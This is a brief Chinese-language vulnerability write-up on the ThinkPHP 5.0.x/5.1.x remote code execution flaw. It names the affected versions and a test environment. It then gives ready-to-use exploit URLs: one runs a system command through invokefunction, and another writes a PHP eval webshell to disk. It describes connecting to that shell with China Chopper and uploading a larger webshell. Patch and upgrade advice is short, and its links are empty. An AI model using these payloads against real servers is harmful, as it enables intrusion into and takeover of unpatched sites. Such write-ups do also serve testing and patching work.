ThinkPHP遠端程式碼執行漏洞

ThinkPHP是一個快速、簡單的基於MVC和麵向物件的輕量級PHP開發框架。

Thinkphp5.x版本中存在一個嚴重的遠端程式碼執行漏洞。這個漏洞的主要原因是由於框架對控制器名沒有進行足夠的校驗導致在沒有開啟強制路由的情況下可以構造惡意語句執行遠端命令

影響範圍

Thinkphp 5.1.0 - 5.1.31

Thinkphp 5.0.5 - 5.0.23

漏洞利用

環境介紹：

thinkphp5.0.22+php5.4.45+ apache2.4.23

1.首先搭建好相應的環境，頁面訪問如下：

2.當看到框架為thinkphp5.x時，我們需要的就是驗證是否存在遠端程式碼執行漏洞

http:// localhost/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

3.確認此處存在遠端程式碼執行後，寫入shell

http:// localhost/public/index.php?s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php eval(@$_POST['a']); ?>

4.嘗試用菜刀進行連線，連線成功

當然這裡我們也可以選擇直接上傳大馬

相比手工，我們也可以選擇工具直接getshell都是可以的

修復建議
1、打補丁：
Thinkphp v5.0.x補丁地址:

Thinkphp v5.1.x補丁地址: 

2、更新框架版本

參考連結

exploit地址：

框架下載地址：

docker漏洞環境原始碼：